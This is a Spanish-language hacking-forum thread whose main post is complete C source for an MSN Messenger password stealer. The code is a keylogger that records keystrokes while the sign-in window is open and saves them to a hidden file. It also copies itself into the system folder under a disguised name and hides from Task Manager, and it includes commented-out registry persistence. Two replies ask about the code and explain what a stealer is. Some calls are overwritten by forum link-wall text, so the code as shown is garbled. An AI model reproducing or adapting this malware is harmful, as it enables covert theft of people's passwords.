comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Stealer MSN

  • 2 Respuestas
  • 2515 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5331
  • Actividad:
    60%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 22, 2011, 10:00:32 pm »
Código: C
  1. #include <stdlib.h>    
  2. #include <windows.h>
  3. #include <stdio.h>
  4. #include <commctrl.h>
  5. #include <Winuser.h>  
  6. #include <string.h>
  7.  
  8. // all includes should be standard in dev
  9.  
  10. /*
  11.    Name: KOrUPt(not tellin)
  12.    Author: KOrUPt
  13.    Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
  14.    Date Written: 01/10/06 - 04/10/06
  15.    Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
  16. */
  17.  
  18.  
  19.  void keys(int key,char *file) // if you try and view the exe in notepad it discloses
  20. {                                                        // quite alot of source code(not good), so i may change the key output to codes instead
  21.  
  22. FILE *key_file;
  23.  
  24. key_file = You are not allowed to view links. Register or Login(file,"a+");
  25.  
  26. Sleep(10);
  27.  
  28. if (key==8)
  29.  
  30. You are not allowed to view links. Register or Login(key_file,"%s","[del]");
  31.  
  32. if (key==13)
  33.  
  34. You are not allowed to view links. Register or Login(key_file,"%s","\n");
  35.  
  36. if (key==32)
  37.  
  38. You are not allowed to view links. Register or Login(key_file,"%s"," ");
  39.  
  40. if (key==VK_CAPITAL)
  41.  
  42. You are not allowed to view links. Register or Login(key_file,"%s","[Caps L]");
  43.  
  44. if (key==VK_TAB)
  45.  
  46. You are not allowed to view links. Register or Login(key_file,"%s","[TAB]");
  47.  
  48. if (key ==VK_CONTROL)
  49.  
  50. You are not allowed to view links. Register or Login(key_file,"%s","[CTRL]");
  51.  
  52. if (key ==VK_PAUSE)
  53.  
  54. You are not allowed to view links. Register or Login(key_file,"%s","[PAUSE]");
  55.  
  56. if (key ==VK_ESCAPE)
  57.  
  58. You are not allowed to view links. Register or Login(key_file,"%s","[ESC]");
  59.  
  60. if (key ==VK_END)
  61.  
  62. You are not allowed to view links. Register or Login(key_file,"%s","[END]");
  63.  
  64. if (key==VK_HOME)
  65.  
  66. You are not allowed to view links. Register or Login(key_file,"%s","[HOME]");
  67.  
  68. if (key ==VK_LEFT)
  69.  
  70. You are not allowed to view links. Register or Login(key_file,"%s","[LEFT]");
  71.  
  72. if (key ==VK_UP)
  73.  
  74. You are not allowed to view links. Register or Login(key_file,"%s","[UP]");
  75.  
  76. if (key ==VK_RIGHT)
  77.  
  78. You are not allowed to view links. Register or Login(key_file,"%s","[RIGHT]");
  79.  
  80. if (key ==VK_DOWN)
  81.  
  82. You are not allowed to view links. Register or Login(key_file,"%s","[DOWN]");
  83.  
  84. if (key ==VK_SNAPSHOT)
  85.  
  86. You are not allowed to view links. Register or Login(key_file,"%s","[PRINT]");
  87.  
  88. if (key ==VK_NUMLOCK)
  89.  
  90. You are not allowed to view links. Register or Login(key_file,"%s","[NUM LOCK]");
  91.  
  92. if (key ==VK_RETURN)
  93.  
  94. You are not allowed to view links. Register or Login(key_file,"%s","[ENTER]\n\n");
  95.  
  96. if (key ==VK_SHIFT)
  97.  
  98. You are not allowed to view links. Register or Login(key_file,"%s","[SHIFT]");
  99.  
  100. if (key ==VK_SPACE)
  101.  
  102. You are not allowed to view links. Register or Login(key_file,"%s","[SPACE]");
  103.  
  104. if (key ==VK_LBUTTON)
  105.  
  106. You are not allowed to view links. Register or Login(key_file,"%s","[LM B]");
  107.  
  108. if (key ==VK_RBUTTON)
  109.  
  110. You are not allowed to view links. Register or Login(key_file,"%s","[RM B]");
  111.  
  112. if (key ==VK_MENU)
  113.  
  114. You are not allowed to view links. Register or Login(key_file,"%s","[ALT]");
  115.  
  116. if (key ==VK_LWIN)
  117.  
  118. You are not allowed to view links. Register or Login(key_file,"%s","[Windows key]");
  119.  
  120. if (key ==VK_ADD)
  121.  
  122. You are not allowed to view links. Register or Login(key_file,"%s","[+]");
  123.  
  124. if (key ==VK_SUBTRACT)
  125.  
  126. You are not allowed to view links. Register or Login(key_file,"%s","[-]");
  127.  
  128. if (key ==VK_DECIMAL)
  129.  
  130. You are not allowed to view links. Register or Login(key_file,"%s","[.]");
  131.  
  132. if (key ==VK_DIVIDE)
  133.  
  134. You are not allowed to view links. Register or Login(key_file,"%s","[DIVIDE KEY]");
  135.  
  136. if (key ==VK_NUMPAD0)
  137.  
  138. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 0]");
  139.  
  140. if (key ==VK_NUMPAD1)
  141.  
  142. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 1]");
  143.  
  144. if (key ==VK_NUMPAD2)
  145.  
  146. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 2]");
  147.  
  148. if (key ==VK_NUMPAD3)
  149.  
  150. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 3]");
  151.  
  152. if (key ==VK_NUMPAD4)
  153.  
  154. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 4]");
  155.  
  156. if (key ==VK_NUMPAD5)
  157.  
  158. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 5]");
  159.  
  160. if (key ==VK_NUMPAD6)
  161.  
  162. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 6]");
  163.  
  164. if (key ==VK_NUMPAD7)
  165.  
  166. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 7]");
  167.  
  168. if (key ==VK_NUMPAD8)
  169.  
  170. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 8]");
  171.  
  172. if (key ==VK_NUMPAD9)
  173.  
  174. You are not allowed to view links. Register or Login(key_file,"%s","[NUMPAD 9]");
  175.  
  176. if (key ==VK_F1)
  177.  
  178. You are not allowed to view links. Register or Login(key_file,"%s","[F1 KEY]");
  179.  
  180. if (key ==VK_F2)
  181.  
  182. You are not allowed to view links. Register or Login(key_file,"%s","[F2 KEY]");
  183.  
  184. if (key ==VK_F3)
  185.  
  186. You are not allowed to view links. Register or Login(key_file,"%s","[F3 KEY]");
  187.  
  188. if (key ==VK_F4)
  189.  
  190. You are not allowed to view links. Register or Login(key_file,"%s","[F4 KEY]");
  191.  
  192. if (key ==VK_F5)
  193.  
  194. You are not allowed to view links. Register or Login(key_file,"%s","[F5 KEY]");
  195.  
  196. if (key ==VK_F6)
  197.  
  198. You are not allowed to view links. Register or Login(key_file,"%s","[F6 KEY]");
  199.  
  200. if (key ==VK_F7)
  201.  
  202. You are not allowed to view links. Register or Login(key_file,"%s","[F7 KEY]");
  203.  
  204. if (key ==VK_F8)
  205.  
  206. You are not allowed to view links. Register or Login(key_file,"%s","[F8 KEY]");
  207.  
  208. if (key ==VK_F9)
  209.  
  210. You are not allowed to view links. Register or Login(key_file,"%s","[F9 KEY]");
  211.  
  212. if (key ==VK_F10)
  213.  
  214. You are not allowed to view links. Register or Login(key_file,"%s","[F10 KEY]");
  215.  
  216. if (key ==VK_F11)
  217.  
  218. You are not allowed to view links. Register or Login(key_file,"%s","[F11 KEY]");
  219.  
  220. if (key ==VK_F12)
  221.  
  222. You are not allowed to view links. Register or Login(key_file,"%s","[F12 KEY]");
  223.  
  224. if (key ==VK_NUMLOCK)
  225.  
  226. You are not allowed to view links. Register or Login(key_file,"%s","[NUMLOCK KEY]");
  227.  
  228. if (key ==VK_SCROLL)
  229.  
  230. You are not allowed to view links. Register or Login(key_file,"%s","[SCROLL LOCK]");
  231.  
  232.  
  233. /*        // WONT WORK ON WIN 9X
  234.  
  235.  
  236. if (key ==VK_OEM_PLUS)
  237.  
  238. fprintf(key_file,"%s","[+]");
  239.  
  240. if (key ==VK_OEM_COMMA)
  241.  
  242. fprintf(key_file,"%s","[,]");
  243.  
  244. if (key ==VK_OEM_MINUS)
  245.  
  246. fprintf(key_file,"%s","[-]");
  247.  
  248. if (key ==VK_OEM_PERIOD)
  249.  
  250. fprintf(key_file,"%s","[.]");
  251.  
  252. */
  253.  
  254. if (key ==190 || key==110)
  255.  
  256. You are not allowed to view links. Register or Login(key_file,"%s",".");
  257.  
  258.  
  259. if (key >=96 && key <= 105){
  260.  
  261. key = key - 48;
  262.  
  263. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  264.  
  265. }
  266.  
  267. if (key >=48 && key <= 59)
  268.  
  269. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  270.  
  271.  
  272.  
  273. if (key !=VK_LBUTTON || key !=VK_RBUTTON){
  274.  
  275. if (key >=65 && key <=90){
  276.  
  277. if (GetKeyState(VK_CAPITAL))
  278.          
  279. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  280. else
  281.  
  282. {
  283.  
  284. key = key +32;
  285.  
  286. You are not allowed to view links. Register or Login(key_file,"%s",&key);
  287.  
  288.  
  289.  
  290. }
  291. }
  292.  
  293. }
  294.  
  295. You are not allowed to view links. Register or Login(key_file);
  296.  
  297.  
  298.  
  299. }
  300.  
  301.  
  302. char buffer[300] = "";
  303. HWND currentwin;
  304. DWORD pid;
  305. unsigned char reg[2] = "1";
  306. HMODULE modH = GetModuleHandle(0);
  307. char dir[255];
  308. char dir2[MAX_PATH];
  309. char dir3[MAX_PATH];
  310. char KeyLogPath[MAX_PATH];                        // holds dir path for wordsv80.ini
  311.  
  312.  
  313.   // Functions
  314.  
  315. BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
  316. {
  317.         char classname[150] = "";
  318.         char windowtext[150] = "";
  319.  
  320.         GetWindowText(hwnd,windowtext,149);
  321.         GetClassName(hwnd,classname,249);
  322.  
  323.    
  324.         if (You are not allowed to view links. Register or Login(windowtext,"Processes") && You are not allowed to view links. Register or Login(classname,"SysListView32") !=NULL)
  325.         {
  326.                 SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
  327.                 return FALSE;
  328.         }      
  329.         return TRUE;
  330. }
  331.  
  332. DWORD WINAPI HideProgram() // also used to hide from taskmgr
  333. {
  334.   for(;;)
  335.  {
  336. Sleep(5);
  337. EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function evrey 5 milee seconds
  338.  }
  339. }
  340.  
  341.  
  342.  
  343. int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
  344.  {
  345.  
  346. char i;
  347. GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
  348. You are not allowed to view links. Register or Login(KeyLogPath,"//wordsv80.ini");      // this is the file that keys are saved to
  349.  
  350.  
  351.  
  352.    // Add to system folder
  353.  
  354. GetModuleFileName(modH, dir2, 256);
  355. GetSystemDirectory(dir,255);
  356.  
  357. You are not allowed to view links. Register or Login(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
  358. CopyFile(dir2,dir,FALSE);        //  but dont know how to change the icon pic, lol, will learn how to soon though
  359. unsigned char dir3[25] = "Sndserv.exe";
  360. SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out
  361.  
  362.  
  363.  
  364. // Add to registry
  365.  
  366. // I think weird decimal vaules makes it less likly to be deleted because it
  367. // hasnt got any spefic name, it could be somthing really importent, dont forget,
  368. // most people are quite scared of editing there reigstry in case they ruin the whole pc,
  369. // if they see something they dont understand, then the old phase "better save than sorry" springs to mind
  370. // i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
  371. // but im talkin about the N0oBs here, sorry noobs lol
  372.  
  373. // oh well back to the code
  374. /*
  375. HKEY key1;
  376. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
  377. RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
  378. RegCloseKey(key1);
  379.  
  380.  
  381. HKEY key2;
  382. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
  383. RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
  384. RegCloseKey(key2);                                                                               //  i dont fully know how this key will react on startup, should be alright lol
  385.  
  386.  
  387.  
  388. HKEY key3;
  389. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
  390. RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
  391. RegCloseKey(key3);
  392.  
  393. HKEY key4;
  394. RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
  395. RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
  396. RegCloseKey(key4);
  397.  
  398.  
  399. // was goin to disable regedit, but decided not to
  400. // in case made the user suspicuos, i prefer the stealth method
  401.  
  402.   */
  403.  
  404.  
  405.  
  406.   while(1)
  407. {
  408. Sleep(20);   // to some save cpu
  409.  
  410.  
  411.  
  412.          // Just in case we need an emergency exit
  413.    if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
  414.    {
  415.    MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
  416.          return 0;
  417.    }
  418.  
  419.                 // cannot close program while login box is present
  420. jump:
  421. currentwin =  GetForegroundWindow();
  422. GetWindowText(currentwin,(char*)buffer,300);
  423. if(You are not allowed to view links. Register or Login(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
  424. {
  425. GetWindowThreadProcessId(currentwin,&pid);
  426.  
  427. for(i=8;i<=190;i++)      // activate keyloger
  428. {
  429. if (GetAsyncKeyState(i) == -32767)
  430. {
  431.  
  432.  
  433.  
  434.  
  435.          keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file
  436.  
  437.  
  438.   goto jump;            // to recheck if logon window is still active, if not continue searching untill found
  439. }
  440. }
  441. }
  442. }
  443. }
  444.  
  445.  
« Última modificación: Febrero 08, 2014, 05:47:50 pm por Expermicid »


Desconectado t0d_mephis

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Junio 22, 2011, 01:14:21 pm »
Cual es la funcion de esto?   :o :o (Pusiste buenos codigos fuente! gracias)

Desconectado startsgame

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 22, 2011, 02:28:47 pm »
Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.

Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.

You are not allowed to view links. Register or Login ;)

 

¿Te gustó el post? COMPARTILO!



Bitcoin Wallet.dat FTP Stealer Source

Iniciado por ANTRAX

Respuestas: 0
Vistas: 4286
Último mensaje Abril 12, 2012, 02:45:11 pm
por ANTRAX